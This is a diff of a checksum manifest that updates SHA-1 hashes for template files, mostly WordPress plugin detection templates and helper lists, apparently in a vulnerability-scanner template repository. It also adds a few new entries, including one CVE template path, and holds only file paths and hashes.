-helpers/wordpress/plugins/post-types-order.txt:d24fa45ca77f079cc359c97272276969e6aead2c -helpers/wordpress/plugins/premium-addons-for-elementor.txt:d166dff4f28c2975160985ddcd2cfa09fd058f90 -helpers/wordpress/plugins/pretty-link.txt:a927170dd02e8227c274370931fc0a823285feea -helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/really-simple-ssl.txt:3eebc7c9c53af6e2c8a91094b656f824a4b7150b -helpers/wordpress/plugins/redirection.txt:392ee3765c26f4ca0b6935f9bb0f006c2354af12 -helpers/wordpress/plugins/redux-framework.txt:143f62d8901ba08771e674764b7064bc35181149 +helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d +helpers/wordpress/plugins/post-smtp.txt:71912467feb2c9dd9cf4980fe27207c145471f4c +helpers/wordpress/plugins/post-types-order.txt:f243f3446bb1226eacba3cdb8b904ef729d6ec9d +helpers/wordpress/plugins/premium-addons-for-elementor.txt:167005dc36e245ab157aa813a088cff941fda8d5 +helpers/wordpress/plugins/pretty-link.txt:e45ae12a7326100f6ce5fbc5ad2c1260c5d71d13 +helpers/wordpress/plugins/really-simple-captcha.txt:ce0d88c5002b6cf7664052f1fc7d652cbdadccec +helpers/wordpress/plugins/really-simple-ssl.txt:d99db0a3dd6b78893c0a445c767ef7a576dce7ab +helpers/wordpress/plugins/redirection.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e +helpers/wordpress/plugins/redux-framework.txt:0ad85a556e9d4c9fd4bb8da0f81f4d28b598587b helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 -helpers/wordpress/plugins/safe-svg.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 -helpers/wordpress/plugins/seo-by-rank-math.txt:4b56e7a6e3c58377a0f32fbbccd9728e724ebe88 -helpers/wordpress/plugins/sg-cachepress.txt:2fcbca708d249a5264bfb58f121b983b931f9729 -helpers/wordpress/plugins/sg-security.txt:403b52175033f5fc6cef0024c84c6d302aaf8633 -helpers/wordpress/plugins/shortcodes-ultimate.txt:5611655cf77fe8960b2e5589920c36c2d628f4cc -helpers/wordpress/plugins/shortpixel-image-optimiser.txt:8279d3e70c4a8279cdfb499a60bef2c4f405d995 +helpers/wordpress/plugins/safe-svg.txt:47ac56ccfa5b6db61c32cb48c2dda8cc64d242cb +helpers/wordpress/plugins/seo-by-rank-math.txt:c98fdfe8d33e88802886bd84d87d6117bcb8ad03 +helpers/wordpress/plugins/sg-cachepress.txt:7035802a8f118b141c54f97b9e8bf36b7d7f53a2 +helpers/wordpress/plugins/sg-security.txt:3591720dc29efed55da59e353bbd1e1ad90dedf6 +helpers/wordpress/plugins/shortcodes-ultimate.txt:bd1b35ea2c8692269da8a819c39a7433032177ea +helpers/wordpress/plugins/shortpixel-image-optimiser.txt:850cfb66b1912fccfdb12a41362d2393042887e5 helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd -helpers/wordpress/plugins/siteguard.txt:156c5ea92bcb32857c9703e2f7f5b16cfdd9e33b -helpers/wordpress/plugins/siteorigin-panels.txt:41cf08ac819fdd5dc0e6b9dc7ddfc82193d36418 -helpers/wordpress/plugins/smart-slider-3.txt:07f225238c158a92b7deeb3c5635165b4b66c54a -helpers/wordpress/plugins/so-widgets-bundle.txt:9761cbe4a43ce85b1f75519e586ea60736cd9c92 +helpers/wordpress/plugins/siteguard.txt:92c6bf6bc1f97136cb8bbe1a936cc4289dff178e +helpers/wordpress/plugins/siteorigin-panels.txt:f522f67ac832d3968e5b0a47580f0ac715e89f4b +helpers/wordpress/plugins/smart-slider-3.txt:ddd091c3f02b8a56a7a2d9a4a0f8387a12a347f9 +helpers/wordpress/plugins/so-widgets-bundle.txt:222da8dca74c58580fd6817da4aef16582951efe helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:3e2cb2d1f1740c5f32e24ad2ae43138ffd391c84 -helpers/wordpress/plugins/sucuri-scanner.txt:223960ccc78aab169c55e54fb7d9ed6bf1fd29d9 +helpers/wordpress/plugins/sucuri-scanner.txt:418cebfead647b325cd7291fe371d7f92515a84f helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b172 -helpers/wordpress/plugins/table-of-contents-plus.txt:31d4596aaf7504ba33b2b1e75aa1ab1f08180eb3 -helpers/wordpress/plugins/tablepress.txt:f243f3446bb1226eacba3cdb8b904ef729d6ec9d -helpers/wordpress/plugins/taxonomy-terms-order.txt:d2a825593d236a4bdf4eeecfe093c2f0318fc0f9 +helpers/wordpress/plugins/table-of-contents-plus.txt:412a33ae14746612317b013dc23213cd79b5f3f3 +helpers/wordpress/plugins/tablepress.txt:c83b2e9f55420fa41efd48e4a45103566c9e4767 +helpers/wordpress/plugins/taxonomy-terms-order.txt:d176141136f1fe969aeca56eb98e3734f24199ae helpers/wordpress/plugins/templately.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/the-events-calendar.txt:c9f130fc6618ab8bbbff14f7f7e69eee0df16b62 +helpers/wordpress/plugins/the-events-calendar.txt:efb11eb82b4282760409042dd3fd4bff129bbec9 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 -helpers/wordpress/plugins/translatepress-multilingual.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 -helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:12291cb9150686dd1175c2a1662b9d1acd8b9b62 -helpers/wordpress/plugins/under-construction-page.txt:7b482eb97a0d1e20b8b333a7435ce0e0bc59d15f +helpers/wordpress/plugins/translatepress-multilingual.txt:14507aa9246588cbf1725303a1878c660615d91a +helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:43d658fcb5e8bd6cac245dd878e485a7651c9a4f +helpers/wordpress/plugins/under-construction-page.txt:17bb8bf9f231900aaec8e0d2788c3fa060ef1c5c helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d -helpers/wordpress/plugins/updraftplus.txt:a401d866d1b56557206e1d826b31759a22852c74 +helpers/wordpress/plugins/updraftplus.txt:e8615588a2454d2d3d48934cdf103f3177c30c37 helpers/wordpress/plugins/use-any-font.txt:76aa3af2b1beb37efc64c37b686676bbf23eb2bb -helpers/wordpress/plugins/user-role-editor.txt:6e73bbd7381d9b2811e083672f02f3cf01659070 +helpers/wordpress/plugins/user-role-editor.txt:9404e7a541d10e6480bcec6f52d5fabcf1fd9c4b helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 -helpers/wordpress/plugins/w3-total-cache.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7 -helpers/wordpress/plugins/webp-converter-for-media.txt:5e8303ed9d8e840c5a3884af1fd3c98b694c3722 +helpers/wordpress/plugins/w3-total-cache.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 +helpers/wordpress/plugins/webp-converter-for-media.txt:5769e56370d18865a0fe37bcd84f60e61f7026d7 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c -helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:a9d2178a3e60db128675c6658f16be3165b8e0f1 -helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:f7ca6a21d278eb5ce64611aadbdb77ef1511d3dd +helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:2f748680a25a036bf7bc9ea657a46c211c9151dc +helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:d03f659256ae48f1c9a26c5aaec38d4360485288 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 -helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:870e5d450f9b724470527fe121b78fd6bbf6d9aa -helpers/wordpress/plugins/woocommerce-payments.txt:ba3b15c5fef0e8dd83af875a0c042b88e195115f -helpers/wordpress/plugins/woocommerce-paypal-payments.txt:51ddbf27bf181d542a23643649c61739795a6771 -helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:5035810a6a3c05e421cd3920ba6f8e19c82e061a -helpers/wordpress/plugins/woocommerce-services.txt:0c6799f2e85eccc7061443f76e45b7b268892b58 -helpers/wordpress/plugins/woocommerce.txt:167529724ac20fabfa5e886f9bb50f1f655f98d7 +helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:c8b9858b5f22b090d294062ac1a62f64a7de4d69 +helpers/wordpress/plugins/woocommerce-payments.txt:870e5d450f9b724470527fe121b78fd6bbf6d9aa +helpers/wordpress/plugins/woocommerce-paypal-payments.txt:0aaa3cea7451675ff270540e13308210d8fce9ab +helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:c7301e925a2837b1aba7035920723a45d112f866 +helpers/wordpress/plugins/woocommerce-services.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7 +helpers/wordpress/plugins/woocommerce.txt:d221ed6fdf5eb7524565cb7b691ea3effdcfb637 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da -helpers/wordpress/plugins/wordfence.txt:a30f338fe030321b2625cdd8b7f33cc5c3d62831 -helpers/wordpress/plugins/wordpress-importer.txt:08208ac734b4811a00c6728e5ae1c066d2e06cc8 -helpers/wordpress/plugins/wordpress-seo.txt:d17a3b6342d69046ccc807a9ece21a00689553c0 +helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 +helpers/wordpress/plugins/wordpress-importer.txt:d195b61caef74dab647d06101869c0863fff7a69 +helpers/wordpress/plugins/wordpress-seo.txt:09c7dcd2ea357796d879b24eb2600e9964417379 helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/wp-fastest-cache.txt:6da43ddc66ea2368258688e802388e932e83f73e -helpers/wordpress/plugins/wp-file-manager.txt:f0e80e9d8b6e35e4d07b971ea614c40d8ec4efa3 -helpers/wordpress/plugins/wp-google-maps.txt:ad9afea0b54b56a5454f9b118b72c6199969a44e -helpers/wordpress/plugins/wp-mail-smtp.txt:ab699e913a72c446e6056233e31f306cb8b49cf2 -helpers/wordpress/plugins/wp-maintenance-mode.txt:d3a5debecb62b3b70bbb48d3756a5239e112bc34 -helpers/wordpress/plugins/wp-migrate-db.txt:591d71e97a25db692c2f038dbb7d616569b743f4 +helpers/wordpress/plugins/wp-fastest-cache.txt:87d8ffba80ba87401ae94d97363f39c9ca8aa639 +helpers/wordpress/plugins/wp-file-manager.txt:8c4e6ce593239d9464a2d3eb48692924898625be +helpers/wordpress/plugins/wp-google-maps.txt:a7271cc82e11f6991ba3e441b86276cbfd98f338 +helpers/wordpress/plugins/wp-mail-smtp.txt:9a0a06f6eb18bf496057acce15162dc100f43480 +helpers/wordpress/plugins/wp-maintenance-mode.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 +helpers/wordpress/plugins/wp-migrate-db.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4deb3041acfd -helpers/wordpress/plugins/wp-optimize.txt:dde3c00b3ed10f73f26097325f535eda0c23d0a7 +helpers/wordpress/plugins/wp-optimize.txt:f85383fcd7c211714084d7fca897998d7d759c5d helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f -helpers/wordpress/plugins/wp-reset.txt:299ef94535e5fc122da1afbd80be0ba4f6f99c3e -helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:28c0e0f9265eb98f8c97c1d9deac29afea6d6792 -helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad -helpers/wordpress/plugins/wp-seopress.txt:9d90f00e19f5543904caf9ab2abd5b800e0613c0 -helpers/wordpress/plugins/wp-sitemap-page.txt:33a34613c20e8e6e7f9ba1135b82bb1608eea6af -helpers/wordpress/plugins/wp-smushit.txt:664c4c547c02ee1e3a770bdf2fc99f33b46ffa42 -helpers/wordpress/plugins/wp-statistics.txt:3b876b7e97baf475486d739676060457743d83c2 -helpers/wordpress/plugins/wp-super-cache.txt:1b2c60436acbda9e2ecb3f2e3625336b0b9a91b1 +helpers/wordpress/plugins/wp-reset.txt:0676d107698477ab3fa1a4f94a324657de0f87fd +helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:99d481ff0df2b58220e9d619c86ddce4d61e9726 +helpers/wordpress/plugins/wp-rollback.txt:9900ba1358421f36ec71073f65f6a41eed98f7c2 +helpers/wordpress/plugins/wp-seopress.txt:4a68bf238bc0f5c253db5c3e544b53f300b954a5 +helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf +helpers/wordpress/plugins/wp-smushit.txt:7a8d382588d05ad4101faadabc1f1b04a42eaada +helpers/wordpress/plugins/wp-statistics.txt:d2c05942fd98efff4c5130f3478ddaad1ed28f27 +helpers/wordpress/plugins/wp-super-cache.txt:e2f2e225c4ff1ca0a8c0083ca61d7e9717bb61d5 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa -helpers/wordpress/plugins/wpcf7-recaptcha.txt:255ee3124118ef39f0c2d984854cb0f180c4b1fe -helpers/wordpress/plugins/wpcf7-redirect.txt:6dd1f25f2a4f5c9c73793bed06929318969169c0 -helpers/wordpress/plugins/wpforms-lite.txt:e6b768d4a25803a824a523ec5dd3fc8b00136b46 -helpers/wordpress/plugins/wps-hide-login.txt:79eec5c95867be248c5b70dc82c95d33a9b7ef10 -helpers/wordpress/plugins/wpvivid-backuprestore.txt:e0055b0fd1d2a73c3ef09516c32eaf8c3517cb6b +helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 +helpers/wordpress/plugins/wpcf7-redirect.txt:d1fd48333115227b181b4b132e5511e91d95bea5 +helpers/wordpress/plugins/wpforms-lite.txt:62156312501df259d1213db5481c36daaa321adc +helpers/wordpress/plugins/wps-hide-login.txt:245d85e4cf834057b5214fa088b67dda2c1ac360 +helpers/wordpress/plugins/wpvivid-backuprestore.txt:59d7e64657a8b97484f080d8c51a6652e22d2a14 helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 -helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:d2728a246c4129a45f2985f6e4f626f9bba678c6 +helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:bac19d8941e404675dba7142fecdc9ea1f371ad9 http/cnvd/2017/CNVD-2017-03561.yaml:79260d0e646db6519b46802fac2d8ec8589d1ba2 http/cnvd/2017/CNVD-2017-06001.yaml:5ce62ea8bef46ad255ccbd17bad1a3fa2ea4e651 http/cnvd/2018/CNVD-2018-13393.yaml:e365c4cc3cecc4451e7c34a6981ab065564b97cb @@ -3341,6 +3341,7 @@ http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 +http/cves/2024/CVE-2024-34982.yaml:3973d5f657a029a5b9285865b8ca075de586fcbf http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c @@ -7100,221 +7101,227 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:e1496850b2a8ebec1b470544d5bb38e52760d900 -http/technologies/wordpress/plugins/add-to-any.yaml:0f7be8390c82a07fad046fbb82773e1efac42e88 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:66ee3ee229794845fa4096906b0c13f42a9b3034 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:2f2f001b0ef8b7107f9711117d38619363371f5f -http/technologies/wordpress/plugins/akismet.yaml:c1e7145252fe3348b0df3e0e960225e948ede5a2 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:79bab293731b67cc070826e472370ebdf0c68a3f -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c5782cae9262eb9122e4a93dda5a198f9a122212 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0674e0ffe428361d3f31974a1f1d19e398285412 -http/technologies/wordpress/plugins/amp.yaml:481e11d8ccfce70cabcb54f11b673b59b33f620a -http/technologies/wordpress/plugins/antispam-bee.yaml:f2de016e8288d62fcd28e5769a763deb0d7fcb8f -http/technologies/wordpress/plugins/astra-sites.yaml:7b1928db619555eb2a8b538e3535f16a762aba07 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:eb2d239e57dc3353581cc430cfc10498c1f4ad90 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:edf9d06299d702f2f2ffe2da8ed48bde284fcd12 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:d0dcd742f185e97b47d2fdcccbe6358f11eb69ec -http/technologies/wordpress/plugins/backwpup.yaml:1f8f6e3859be36172b3247114ae58752d99a9708 -http/technologies/wordpress/plugins/better-search-replace.yaml:1b95407d1cdc1301a58c6fc53486b5daedebac04 -http/technologies/wordpress/plugins/better-wp-security.yaml:c23b2ef4841fb11164f0deaf0093bd8ad5fe6dfd -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:b97a1af245fd492e9dd5caa1ae1795c36dc8b7e9 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:2d18f0df7842e954fd221559522a2c66936c3cea -http/technologies/wordpress/plugins/breeze.yaml:04f00965ef684ca72faae5d8e707f7c9b4175c2e -http/technologies/wordpress/plugins/broken-link-checker.yaml:b3711785ae3b4bfff66560f7dc277962390a3ce3 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:726fcb89502068235ff26989b066f0d786080c1f -http/technologies/wordpress/plugins/classic-editor.yaml:ba1783d2d8b79ef0accbb372b2fa7f079317aa52 -http/technologies/wordpress/plugins/classic-widgets.yaml:b6253f0c17837469ab7a612be0fa37cc747733e2 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:110914e6b488e5b4f7c0668412ea60213bec7727 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:691a8e250d32df738871d3783b8fb64bb30c051d +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:cd651c83f08f229cb414b7151f8045287dc54fec +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:ba158b0c07f834036879b648d0ac509bea1a2bc3 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:f034f3a6d4731623d12567fd8e3585f8d7ea9a5b -http/technologies/wordpress/plugins/coblocks.yaml:7209fb3227695a8b72075809f1d86b52f94a999f -http/technologies/wordpress/plugins/code-snippets.yaml:49ba2db5125b35721c292450ebc6131949560cf5 -http/technologies/wordpress/plugins/coming-soon.yaml:96b276553b8e974d9efc9fe29078f37dfacb1d99 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:7fd5b380e2aea93d5994ff7a9afa2da6579772d5 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f019cfef1f4958566daf714ff79d9d15a6f5b534 -http/technologies/wordpress/plugins/contact-form-7.yaml:eef916a69d20d9cb28d5389cd8fde7533ee0068a -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6831ab139eaa547326763d0b74b87ce491829ff5 -http/technologies/wordpress/plugins/cookie-law-info.yaml:9a2734da7c5ce39d67c2655f0d7116686add438f -http/technologies/wordpress/plugins/cookie-notice.yaml:9e1d7874ef1baf7b365d13095444bfa5d18b580e -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5457def69d1fea5f0ed6cfe18e6ed75c13fc912d -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:f832d4da411a59eccbf5ce737407a7fb805ba9f5 -http/technologies/wordpress/plugins/custom-css-js.yaml:723c155eec73a7f01e162789a88e761b8cb3f842 -http/technologies/wordpress/plugins/custom-fonts.yaml:4bc5fd82eca7a2cd27f4c8af70f6b06848d4ea9e -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:f5532e632ceb703c83cec065aebdd7d747ef9252 -http/technologies/wordpress/plugins/disable-comments.yaml:e4cad404bc313472c1c407baa4d5eb864a1122c9 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:af09df450215c03ff65d515af29f4e6a774ab380 -http/technologies/wordpress/plugins/duplicate-page.yaml:cf4ea550f85ceca344237e77c4a6ee1eafd321df -http/technologies/wordpress/plugins/duplicate-post.yaml:de79757967d2b51f53432a42a56a2c0fa70693c6 -http/technologies/wordpress/plugins/duplicator.yaml:bf9f65beedaebc7d933a491ba9b4fa358dbc0f20 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:fffdc81bf0dd52b6f0237eabd8009fbba51ab94d +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:dc2095558be073a2330fccfc86b78e385768ba6e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/copy-delete-posts.yaml:1c9bb377abbf336c9ab111f368f48d8f8ec3927c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:80ee9d72a05fa607b3bac8d43eaffdc294784889 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:c5676cb3ffcf4cd88144a09e5d6acffcd2ce62f1 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:fdd2c32e4640843aacc4fce1d65a3175e32c988a +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13910c72122557903a40002d0f0dcd242980da26 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:514a18ba0e0aaaa35ba006464d22bf33ec54eaac -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:929edaeb21d6cbb5b3e95517e8e55d17dde62302 -http/technologies/wordpress/plugins/elementor.yaml:b2c90bf2d483768d2e46a3bd38eb68af45e3b8e7 -http/technologies/wordpress/plugins/elementskit-lite.yaml:1c3ba6136f1955d4d5990f2a4ff450f7d2600dae -http/technologies/wordpress/plugins/enable-media-replace.yaml:adf7bfaf8737f217ba26fbfcc28801c8e8116f53 -http/technologies/wordpress/plugins/envato-elements.yaml:fc222cfc4e847de503088330e831d50d2ff0a272 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:ad2a220c48833b9660e56942068e43cf6f457f49 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1bd2e8b2e3b65d8baba502dce3c42d64f2deabb5 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:87d2983c55601e8e67f63cf99728585a57647ad6 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:267045c6fe95d5ef9afbf69f8661166784f4e0eb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:859e7ee37b4395f6f188cca235f3acb95383009a -http/technologies/wordpress/plugins/flamingo.yaml:31161643ffc067a0e60b748d5c60b473fc305b31 -http/technologies/wordpress/plugins/fluentform.yaml:4ade2e6ed157a881e3dc35cc36aed5ecf9ed97d9 -http/technologies/wordpress/plugins/font-awesome.yaml:e5b445546886da8fadaf29d74931a9c0a87f523b -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:fa13ff9cc295f0fb075fef562ce5b6a1c630509d -http/technologies/wordpress/plugins/formidable.yaml:f70cb726e7c4f17080833efe79a5adf94b40e009 -http/technologies/wordpress/plugins/forminator.yaml:d6cf42d2efeb3cd2ba0091d5897c0c8250d4d0cd -http/technologies/wordpress/plugins/ga-google-analytics.yaml:be0680ad719044934fe9a752c02215d624a64131 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:38e07c2c0c46f7398a8f2c67003ecab9ca0bf990 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:578525349eb8679b4fc4d075e8c26385412cb446 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:bc98cdbffbfdfe958b2c2cecad8f7db890f04eef -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:f7daa77dc311a45e3973be93f6c19851425b3606 -http/technologies/wordpress/plugins/google-site-kit.yaml:dcb40359ff33d0848dc9a05c6fc4cd94233f9c1a 